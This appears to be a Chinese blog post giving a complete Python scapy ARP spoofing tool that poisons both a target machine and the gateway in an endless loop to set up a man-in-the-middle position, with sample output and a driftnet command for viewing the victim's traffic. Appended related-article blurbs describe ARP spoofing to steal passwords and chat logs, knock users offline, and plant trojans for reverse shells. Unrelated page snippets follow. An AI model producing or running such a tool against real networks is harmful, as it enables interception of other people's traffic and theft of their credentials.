刚学习了scapy模块的一些用法,非常强大,为了练手,利用此模块编写了一个arp欺骗工具,其核心是构造arp欺骗包。加了一个-a参数用于进行全网欺骗,先暂不实现。代码如下:

 #--*--coding=utf-8--*--

 from scapy.all import *

 import optparse

 import threading

 #解决在linux系统上运行时报的unicode编码相关错误

 import sys

 reload(sys)

 sys.setdefaultencoding('utf-8')

 def getMac(tgtIP):

     '''

     调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。

     '''

     try:

         tgtMac = getmacbyip(tgtIP)

         return tgtMac

     except:

         print '[-]请检查目标IP是否存活' 

 def createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP):

     '''

     生成ARP数据包,伪造网关欺骗目标计算机

     srcMac:本机的MAC地址,充当中间人

     tgtMac:目标计算机的MAC

     gatewayIP:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击

     tgtIP:目标计算机的IP

     op=2,表示ARP响应

     '''

     pkt = Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2)

     return pkt

 def createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP):

     '''

     生成ARP数据包,伪造目标计算机欺骗网关

     srcMac:本机的MAC地址,充当中间人

     gatewayMac:网关的MAC

     tgtIP:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击

     gatewayIP:网关的IP

     op=2,表示ARP响应

     '''

     pkt = Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2)

     return pkt

 def main():

     usage = 'Usage: %prog -t <targetip> -g <gatewayip> -i <interface> -a'

     parser = optparse.OptionParser(usage,version='v1.0')

     parser.add_option('-t',dest='targetIP',type='string',help='指定目标计算机IP')

     parser.add_option('-g',dest='gatewayIP',type='string',help='指定网关IP')

     parser.add_option('-i',dest='interface',type='string',help='指定使用的网卡')

     parser.add_option('-a',dest='allarp',action='store_true',help='是否进行全网arp欺骗')

     options,args = parser.parse_args()

     tgtIP = options.targetIP

     gatewayIP = options.gatewayIP

     interface = options.interface

     if tgtIP == None or gatewayIP == None or interface == None:

         print parser.print_help()

         exit(0)

     srcMac = get_if_hwaddr(interface)

     print '本机MAC地址是:',srcMac

     tgtMac = getMac(tgtIP)

     print '目标计算机MAC地址是:',tgtMac

     gatewayMac = getMac(gatewayIP)

     print '网关MAC地址是:',gatewayMac

     raw_input('按任意键继续:')

     pktstation = createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP)

     pktgateway = createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP)

     i = 1

     while True:

         t = threading.Thread(target=sendp,args=(pktstation,),kwargs={'iface':interface})

         t.start()

         t.join()

         print str(i) + ' [*]发送一个计算机ARP欺骗包'

         s = threading.Thread(target=sendp,args=(pktgateway,),kwargs={'iface':interface,})

         s.start()

         s.join()

         print str(i) + ' [*]发送一个网关ARP欺骗包'

         i += 1       

 if __name__ == '__main__':

     main()

验证如下:

 # python arpspoof.py -t 192.168.1.28 -g 192.168.1.1 -i wlan0

 WARNING: No route found for IPv6 destination :: (no default route?)

 本机MAC地址是: xxx

 目标计算机MAC地址是:xxx

 网关MAC地址是: xxx

 按任意键继续:

 .

 Sent 1 packets.

 1 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 1 [*]发送一个网关ARP欺骗包

 .

 Sent 1 packets.

 2 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 2 [*]发送一个网关ARP欺骗包

 .

 Sent 1 packets.

 3 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 3 [*]发送一个网关ARP欺骗包

 ......

#driftnet -i wlan0

用python编写的定向arp欺骗工具的更多相关文章

  1. Python编写类似nmap的扫描工具

    文主要是利用scapy包编写了一个简易扫描工具,支持ARP.ICMP.TCP.UDP发现扫描,支持TCP SYN.UDP端口扫描,如下: usage: python scan.py <-p pi ...

  2. Python编写的Linux邮件发送工具

    之前有用过Linux自带的mail工具来定时发送邮件,但是要装mailx还有配mail.rc,这还比较正常,关键是到了ubantu下这工具用起来真是操蛋,如果哪天其他的unix like操作系统也有需 ...

  3. 用python编写的excel拆分小工具

    from datetime import date,datetime from openpyxl import Workbook from openpyxl import load_workbook ...

  4. Python黑帽编程 3.1 ARP欺骗

    Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...

  5. Python黑客编程ARP欺骗

    Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...

  6. 使用ARP欺骗, 截取局域网中任意一台机器的网页请求,破解用户名密码等信息

    ARP欺骗的作用 当你在网吧玩,发现有人玩LOL大吵大闹, 用ARP欺骗把他踢下线吧 当你在咖啡厅看上某一个看书的妹纸,又不好意思开口要微信号, 用arp欺骗,不知不觉获取到她的微信号和聊天记录,吓一 ...

  7. Arp欺骗攻击的另类应用之屌丝泡妞记

    http://www.2cto.com/Article/201210/163974.html   arp欺骗,我想大家都应该知道怎么回事了.不知道的去问度娘...   就不废话了,还是直接上图上教程比 ...

  8. Mac和Linux系统的:Arp欺骗源码

    linux系统, 简化版的ARP欺骗工具 精简版, 没有很多代码, 只要把准备好的数据, 发送给到网卡接口, 利用这个工具, 可以让局域网内的一台计算机暂时掉线: #include <stdio ...

  9. kali系统:局域网arp欺骗, 搞定任意windows计算机

    目的 通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机 准备 kali系统 metaspolit的使用 Arp欺骗工具:bettercap ...

随机推荐

  1. 7,数据类型转换,set 集合,和深浅copy

    str转换成list  用split list转换成str  用join tuple转换成list tu1 = (1,2,3) li = list(tu1)(强转) tu2 = tuple(li)(强 ...

  2. mac finder中添加自定义边栏

    想在finder中添加自定义边栏,操作如图所示: 选中边栏中任意边栏项,右键-在上层文件夹中显示,然后创建新的文件夹,将该文件夹拖到边栏中即可.

  3. 五、docker配置镜像加速器之阿里云

    1 配置docker加速器 实在忍受不了pull的速度--------- 访问网址: https://dev.aliyun.com/search.html 点击管理中心: 根据操作稳定配置:

  4. redis中redis.conf配置文件

    redis.conf文件配置解释 1. Redis默认不是以守护进程的方式运行,可以通过该配置项修改,使用yes启用守护进程 daemonize yes 2. 当Redis以守护进程方式运行时,Red ...

  5. python 列表 字符串 转换

    列表转字符串python中的列表l = ['1','2','3','4']转成str型'1,2,3,4'','.join(l)这个方法,列表里都是字符串的话可以这样用.列表里是整数的情况可以用: &g ...

  6. 浅谈中途相遇攻击--meet-in-the-middle attack

    貌似挖的坑也够多了....好多都没填,这篇最后会不会TJ还得看心情TUT 看过大白书的人应该都会发现一种神奇的算法:中途相遇法.(在第58页)这种算法将以空间换时间的思路运用到了极致,但事实上它在密码 ...

  7. 常州模拟赛d4t2 陶陶摘苹果

    题目描述 陶陶家的院子里有一棵苹果树,每到秋天树上就会结出 n 个苹果.苹果成熟的时候,陶陶就会 跑去摘苹果. 陶陶的手不能弯 (他仅能把手伸直),当且仅当陶陶达到的高度与苹果的高度相等的时候,陶陶 ...

  8. [HDU-5536] Chip Factory (01字典树)

    Problem Description John is a manager of a CPU chip factory, the factory produces lots of chips ever ...

  9. (转)WaitForSingleObject函数的使用

    WaitForSingleObject 函数 DWORD WaitForSingleObject( HANDLE hObject, DWORD dwMilliseconds ); 第一个参数hObje ...

  10. log4j详细配置解析

    出自:http://www.blogjava.net/zJun/archive/2006/06/28/55511.html Log4J的配置文件(Configuration File)就是用来设置记录 ...